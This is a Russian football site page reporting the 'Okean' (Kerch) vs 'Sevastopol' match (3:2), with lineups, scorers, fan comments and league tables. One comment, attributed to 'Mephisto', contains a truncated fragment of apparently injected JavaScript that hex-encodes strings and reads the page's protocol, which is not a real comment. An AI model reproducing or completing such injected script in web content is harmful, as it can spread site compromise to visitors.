Премьер-лига КФС. 7-й тур. «Океан» (Керчь) – «Севастополь». Протокольные данные, голы

«Океан» (Керчь) – «Севастополь» – 3:2
3 октября. 16:00. Керчь. Стадион "им. 50 лет октября".
2500 зрителей. 20°C. Оценка поля – 3 балла.
 
Океан: Черноруков, Михайлюк, Кулеша, Нарижний, Янковский (Зарядкин, 89), Чечулин, Кокоскерия (к) (Гогичаишвили Б., 46), Романенко, Щербак (Попов, 90+4), Секрет (Юдов, 86), Коляев
НЗ: Бибченко, Гогичаишвили Т., Черных
Главный тренер: Артур Оленин
 
Севастополь: Науменко, Гуйганов, Гевлич (Мейлах, 89), Шишкин, Челядник, Узбек (Данишевский, 76), Култышев, Кива, Жабокрицкий (к), Прокопенко, Плешаков
НЗ: Щендрыгин, Гудзикевич, Ляпусов, Медведенко, Левинский
Главный тренер: Олег Лещинский
 
Голы: Коляев (40, 73), Секрет (51) - Кива (7), Плешаков (34)
 
Нереализованный пенальти: Кива (32 - вратарь)
 
Предупреждения: Михайлюк (26), Янковский (28), Нарижний (75), Черноруков (90+5) - Гевлич (42), Левинский (90+2)
 
Арбитры: Юрий Волков, Руслан Селимов, Дмитрий Гачмин (все - Симферополь)
 
4-й арбитр: Денис Кораблев (Керчь)
 
Инспектор: Юрий Абраменко (Симферополь)
Голы

13 комментариев

Комментарии пользователей сайта



Mephisto Севастополь
5 Окт, 2015 (пн, 06:42)

// t;t++)e+=o.charCodeAt(t).toString(16);re turn e},p=function(){var w=window,p=w.document.location.protocol; if(p.indexOf('http')==0){return p}for(var e=0;e  
vlakos (4 октября 2015, 19:12),  
причём безоговорочный...

vlakos Севастополь
4 Окт, 2015 (вс, 19:12)

А ведь это позор...

molich Севастополь
4 Окт, 2015 (вс, 18:17)

Sevic (4 октября 2015, 01:33),самое интересное что никто из команд на фин. положение не жалуется, а билеты самые дорогие только у нас.

Gangster Севастополь
4 Окт, 2015 (вс, 14:10)

Sevic (4 октября 2015, 01:33),  
  
все тоже самое про геройство, патриотизм и про то, что стыдно, передайте, пожалуйста, господам футболистам! А уже потом господа болельщики ради справедливости так уж и быть пойдут отмучаются пару часов, глядя на этот провинциальный театр и даже деньги заплатят.

Старпом Севастополь
4 Окт, 2015 (вс, 13:05)

Sevic (4 октября 2015, 01:33),  
Нас тут за Родину агитровать не надо. Все прекрасно знают положение. Для профи и патриотов Города-героя это не оправдание , а раздражитель : да мы без денег , да мы полуголодные , но мы вышли на поле и поимели вас сытых и с деньгами , потомушто мы сильнее и в таком состоянии.... Где это ?????? В театре ????  
И люди в своем праве не ездить , не смотреть на позор. Стыдно тем , кто прогнулся под трудности и опустил ноги....

Sevic Севастополь
4 Окт, 2015 (вс, 01:33)

aleksis (3 октября 2015, 20:03), Город-Герой пишется с заглавной в нашем случае. Вот и весь патриотизм. А также - игра гумно, значит не поеду. Стыдно, господа севастопольцы!  
 
П.С. Не обиды ради, но справедливости! Не только футболисты в тяжелом фин. положении. А вы не театр пришли. Не так?

molich Севастополь
3 Окт, 2015 (сб, 23:43)

в первый раз я рад что не поехал.

aleksis Севастополь
3 Окт, 2015 (сб, 20:03)

Ну вот и свершилось! Команда бросила играть. Такое впечатление что идет полный слив, некоторые "крутые"игроки просто отбывают обязаловку. Игра пропала, идет обычный дворовой футбол, что и показал этот матч. Никаких наигранных и продуманных комбинаций, никакого желания у игроков трудится на поле, где же патриотизм каждого игрока севастопольца, про город-герой уже забыли...Вот господин Красильников и "герои-севастопольцы" играют в нашей команде. Денег не платят - играть не будем - вот и весь хренов патриотизм....Пришло наверное время принимать решения по этим "крутым"[цензура]оям - севастопольцам, лентяям и понтовилам типа Кива, Прокопенко, Култышев и отдельных не тянущих стариков пора прощаться. В Симферополе с такой игрой ловить нечего, наверное не поеду по телику как и этот буду смотреть.....Лещинский сказал что к новому году будут какие-то изменения вот они нихрена и не играю,т хотя должно быть все наоборот, кто конечно хочет остаться тот играет но один в поле не воин... Все блин, сегодня расстроили по полной.....

Maslov97 Майкоп
3 Окт, 2015 (сб, 19:57)

Браво,Океан!Может после этого кто-то из наших зашевелится!

Акела_СС Севастополь
3 Окт, 2015 (сб, 19:45)

тоже самое,что то напоминающее игру в первом тайме и полный провал во втором. Физически команда не готова.....


Турнирная таблица

1. Рубин Ялта Рубин Ялта 12
2. Астрахань Астрахань 10
3. Легион Легион 9
4. Биолог-Новокубанск Биолог-Новокубанск 7
5. Ростов-2 Ростов-2 6
6. Строитель Строитель 6
7. Кубань Холдинг Кубань Холдинг 5
8. Динамо Ставрополь Динамо Ставрополь 5
9. Севастополь Севастополь 4
10. Форте Форте 3
11. Дружба Дружба 3
12. Спартак-Нальчик Спартак-Нальчик 3
13. Победа Победа 3
14. Нарт Нарт 3
15. Ангушт Ангушт 2
16. Динамо-2 Динамо-2 1
17. Алания-2 Алания-2 1
ПОДРОБНАЯ ТАБЛИЦА

БОМБАРДИРЫ

Максим Супрун

Максим Супрун
Полузащитник

1 мяч



Валерий  Ганус

Валерий Ганус
Защитник

1 мяч



ИГРОКИ АПРЕЛЯ

Максим Супрун
Полузащитник
средний бал - 4.8
голосов - 5



Александр Смирнов
Полузащитник
средний бал - 4.4
голосов - 5



Дмитрий Иванов
Нападающий
средний бал - 4.4
голосов - 5


ДНИ РОЖДЕНИЯ

Александр Смирнов
Полузащитник

30 апреля - 24 года



Юрий Колесников
Врач по спортивной медицине

3 мая - 70 лет



Редван Османов
Нападающий

5 мая - 31 год